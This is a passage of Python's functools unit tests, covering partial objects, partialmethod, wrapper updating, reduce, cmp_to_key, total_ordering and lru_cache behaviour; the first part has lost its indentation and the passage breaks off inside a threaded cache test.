args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
# Only "true" partial is optimized
if partial.__name__ != 'partial':
return
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial is c_functools.partial:
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual('{}({!r})'.format(name, capture),
repr(f))
f = self.partial(capture, *args)
self.assertEqual('{}({!r}, {})'.format(name, capture, args_repr),
repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
['{}({!r}, {})'.format(name, capture, kwargs_repr)
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
['{}({!r}, {}, {})'.format(name, capture, args_repr, kwargs_repr)
for kwargs_repr in kwargs_reprs])
def test_pickle(self):
f = self.partial(signature, 'asdf', bar=True)
f.add_something_to__dict__ = True
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f), signature(f_copy))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaisesRegex(SystemError,
"new style getargs format but argument is not a tuple",
f.__setstate__, BadSequence())
class TestPartialPy(TestPartial, unittest.TestCase):
partial = staticmethod(py_functools.partial)
if c_functools:
class PartialSubclass(c_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = PartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce(unittest.TestCase):
func = functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
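# cmp_to_key adapts an old-style three-way comparison function into a key
# object for sorted()/min()/max(), e.g. sorted(values, key=cmp_to_key(mycmp));
# the wrapper objects compare through mycmp and are deliberately unhashable,
# which test_hash below verifies.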
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):

    def test_total_ordering_lt(self):
        @functools.total_ordering
        class A:
            def __init__(self, value):
                self.value = value
            def __lt__(self, other):
                return self.value < other.value
            def __eq__(self, other):
                return self.value == other.value
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))
        self.assertFalse(A(1) > A(2))

    def test_total_ordering_le(self):
        @functools.total_ordering
        class A:
            def __init__(self, value):
                self.value = value
            def __le__(self, other):
                return self.value <= other.value
            def __eq__(self, other):
                return self.value == other.value
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))
        self.assertFalse(A(1) >= A(2))

    def test_total_ordering_gt(self):
        @functools.total_ordering
        class A:
            def __init__(self, value):
                self.value = value
            def __gt__(self, other):
                return self.value > other.value
            def __eq__(self, other):
                return self.value == other.value
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))
        self.assertFalse(A(2) < A(1))

    def test_total_ordering_ge(self):
        @functools.total_ordering
        class A:
            def __init__(self, value):
                self.value = value
            def __ge__(self, other):
                return self.value >= other.value
            def __eq__(self, other):
                return self.value == other.value
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))
        self.assertFalse(A(2) <= A(1))

    def test_total_ordering_no_overwrite(self):
        # new methods should not overwrite existing
        @functools.total_ordering
        class A(int):
            pass
        self.assertTrue(A(1) < A(2))
        self.assertTrue(A(2) > A(1))
        self.assertTrue(A(1) <= A(2))
        self.assertTrue(A(2) >= A(1))
        self.assertTrue(A(2) <= A(2))
        self.assertTrue(A(2) >= A(2))

    def test_no_operations_defined(self):
        with self.assertRaises(ValueError):
            @functools.total_ordering
            class A:
                pass

    def test_type_error_when_not_implemented(self):
        # bug 10042; ensure stack overflow does not occur
        # when decorated types return NotImplemented
        @functools.total_ordering
        class ImplementsLessThan:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ImplementsLessThan):
                    return self.value == other.value
                return False
            def __lt__(self, other):
                if isinstance(other, ImplementsLessThan):
                    return self.value < other.value
                return NotImplemented

        @functools.total_ordering
        class ImplementsGreaterThan:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ImplementsGreaterThan):
                    return self.value == other.value
                return False
            def __gt__(self, other):
                if isinstance(other, ImplementsGreaterThan):
                    return self.value > other.value
                return NotImplemented

        @functools.total_ordering
        class ImplementsLessThanEqualTo:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ImplementsLessThanEqualTo):
                    return self.value == other.value
                return False
            def __le__(self, other):
                if isinstance(other, ImplementsLessThanEqualTo):
                    return self.value <= other.value
                return NotImplemented

        @functools.total_ordering
        class ImplementsGreaterThanEqualTo:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ImplementsGreaterThanEqualTo):
                    return self.value == other.value
                return False
            def __ge__(self, other):
                if isinstance(other, ImplementsGreaterThanEqualTo):
                    return self.value >= other.value
                return NotImplemented

        @functools.total_ordering
        class ComparatorNotImplemented:
            def __init__(self, value):
                self.value = value
            def __eq__(self, other):
                if isinstance(other, ComparatorNotImplemented):
                    return self.value == other.value
                return False
            def __lt__(self, other):
                return NotImplemented

        with self.subTest("LT < 1"), self.assertRaises(TypeError):
            ImplementsLessThan(-1) < 1
        with self.subTest("LT < LE"), self.assertRaises(TypeError):
            ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
        with self.subTest("LT < GT"), self.assertRaises(TypeError):
            ImplementsLessThan(1) < ImplementsGreaterThan(1)
        with self.subTest("LE <= LT"), self.assertRaises(TypeError):
            ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
        with self.subTest("LE <= GE"), self.assertRaises(TypeError):
            ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
        with self.subTest("GT > GE"), self.assertRaises(TypeError):
            ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
        with self.subTest("GT > LT"), self.assertRaises(TypeError):
            ImplementsGreaterThan(5) > ImplementsLessThan(5)
        with self.subTest("GE >= GT"), self.assertRaises(TypeError):
            ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
        with self.subTest("GE >= LE"), self.assertRaises(TypeError):
            ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
        with self.subTest("GE when equal"):
            a = ComparatorNotImplemented(8)
            b = ComparatorNotImplemented(8)
            self.assertEqual(a, b)
            with self.assertRaises(TypeError):
                a >= b
        with self.subTest("LE when equal"):
            a = ComparatorNotImplemented(9)
            b = ComparatorNotImplemented(9)
            self.assertEqual(a, b)
            with self.assertRaises(TypeError):
                a <= b

    def test_pickle(self):
        for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
            for name in '__lt__', '__gt__', '__le__', '__ge__':
                with self.subTest(method=name, proto=proto):
                    method = getattr(Orderable_LT, name)
                    method_copy = pickle.loads(pickle.dumps(method, proto))
                    self.assertIs(method_copy, method)


@functools.total_ordering
class Orderable_LT:
    def __init__(self, value):
        self.value = value
    def __lt__(self, other):
        return self.value < other.value
    def __eq__(self, other):
        return self.value == other.value
class TestLRU:

    def test_lru(self):
        def orig(x, y):
            return 3 * x + y
        f = self.module.lru_cache(maxsize=20)(orig)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(maxsize, 20)
        self.assertEqual(currsize, 0)
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 0)

        domain = range(5)
        for i in range(1000):
            x, y = choice(domain), choice(domain)
            actual = f(x, y)
            expected = orig(x, y)
            self.assertEqual(actual, expected)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertTrue(hits > misses)
        self.assertEqual(hits + misses, 1000)
        self.assertEqual(currsize, 20)

        f.cache_clear()   # test clearing
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 0)
        self.assertEqual(currsize, 0)
        f(x, y)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 1)
        self.assertEqual(currsize, 1)

        # Test bypassing the cache
        self.assertIs(f.__wrapped__, orig)
        f.__wrapped__(x, y)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 1)
        self.assertEqual(currsize, 1)

        # test size zero (which means "never-cache")
        @self.module.lru_cache(0)
        def f():
            nonlocal f_cnt
            f_cnt += 1
            return 20
        self.assertEqual(f.cache_info().maxsize, 0)
        f_cnt = 0
        for i in range(5):
            self.assertEqual(f(), 20)
        self.assertEqual(f_cnt, 5)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 0)
        self.assertEqual(misses, 5)
        self.assertEqual(currsize, 0)

        # test size one
        @self.module.lru_cache(1)
        def f():
            nonlocal f_cnt
            f_cnt += 1
            return 20
        self.assertEqual(f.cache_info().maxsize, 1)
        f_cnt = 0
        for i in range(5):
            self.assertEqual(f(), 20)
        self.assertEqual(f_cnt, 1)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 4)
        self.assertEqual(misses, 1)
        self.assertEqual(currsize, 1)

        # test size two
        @self.module.lru_cache(2)
        def f(x):
            nonlocal f_cnt
            f_cnt += 1
            return x*10
        self.assertEqual(f.cache_info().maxsize, 2)
        f_cnt = 0
        for x in 7, 9, 7, 9, 7, 9, 8, 8, 8, 9, 9, 9, 8, 8, 8, 7:
            #    *  *              *                          *
            self.assertEqual(f(x), x*10)
        self.assertEqual(f_cnt, 4)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(hits, 12)
        self.assertEqual(misses, 4)
        self.assertEqual(currsize, 2)

    def test_lru_with_maxsize_none(self):
        @self.module.lru_cache(maxsize=None)
        def fib(n):
            if n < 2:
                return n
            return fib(n-1) + fib(n-2)
        self.assertEqual([fib(n) for n in range(16)],
            [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
        fib.cache_clear()
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))

    def test_lru_with_maxsize_negative(self):
        @self.module.lru_cache(maxsize=-10)
        def eq(n):
            return n
        for i in (0, 1):
            self.assertEqual([eq(n) for n in range(150)], list(range(150)))
        self.assertEqual(eq.cache_info(),
            self.module._CacheInfo(hits=0, misses=300, maxsize=-10, currsize=1))

    def test_lru_with_exceptions(self):
        # Verify that user_function exceptions get passed through without
        # creating a hard-to-read chained exception.
        # http://bugs.python.org/issue13177
        for maxsize in (None, 128):
            @self.module.lru_cache(maxsize)
            def func(i):
                return 'abc'[i]
            self.assertEqual(func(0), 'a')
            with self.assertRaises(IndexError) as cm:
                func(15)
            self.assertIsNone(cm.exception.__context__)
            # Verify that the previous exception did not result in a cached entry
            with self.assertRaises(IndexError):
                func(15)

    def test_lru_with_types(self):
        for maxsize in (None, 128):
            @self.module.lru_cache(maxsize=maxsize, typed=True)
            def square(x):
                return x * x
            self.assertEqual(square(3), 9)
            self.assertEqual(type(square(3)), type(9))
            self.assertEqual(square(3.0), 9.0)
            self.assertEqual(type(square(3.0)), type(9.0))
            self.assertEqual(square(x=3), 9)
            self.assertEqual(type(square(x=3)), type(9))
            self.assertEqual(square(x=3.0), 9.0)
            self.assertEqual(type(square(x=3.0)), type(9.0))
            self.assertEqual(square.cache_info().hits, 4)
            self.assertEqual(square.cache_info().misses, 4)

    def test_lru_with_keyword_args(self):
        @self.module.lru_cache()
        def fib(n):
            if n < 2:
                return n
            return fib(n=n-1) + fib(n=n-2)
        self.assertEqual(
            [fib(n=number) for number in range(16)],
            [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610]
        )
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=28, misses=16, maxsize=128, currsize=16))
        fib.cache_clear()
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=0, misses=0, maxsize=128, currsize=0))

    def test_lru_with_keyword_args_maxsize_none(self):
        @self.module.lru_cache(maxsize=None)
        def fib(n):
            if n < 2:
                return n
            return fib(n=n-1) + fib(n=n-2)
        self.assertEqual([fib(n=number) for number in range(16)],
            [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610])
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=28, misses=16, maxsize=None, currsize=16))
        fib.cache_clear()
        self.assertEqual(fib.cache_info(),
            self.module._CacheInfo(hits=0, misses=0, maxsize=None, currsize=0))

    def test_lru_cache_decoration(self):
        def f(zomg: 'zomg_annotation'):
            """f doc string"""
            return 42
        g = self.module.lru_cache()(f)
        for attr in self.module.WRAPPER_ASSIGNMENTS:
            self.assertEqual(getattr(g, attr), getattr(f, attr))

    @unittest.skipUnless(threading, 'This test requires threading.')
    def test_lru_cache_threaded(self):
        n, m = 5, 11
        def orig(x, y):
            return 3 * x + y
        f = self.module.lru_cache(maxsize=n*m)(orig)
        hits, misses, maxsize, currsize = f.cache_info()
        self.assertEqual(currsize, 0)

        start = threading.Event()
        def full(k):
            start.wait(10)
            for _ in range(m):
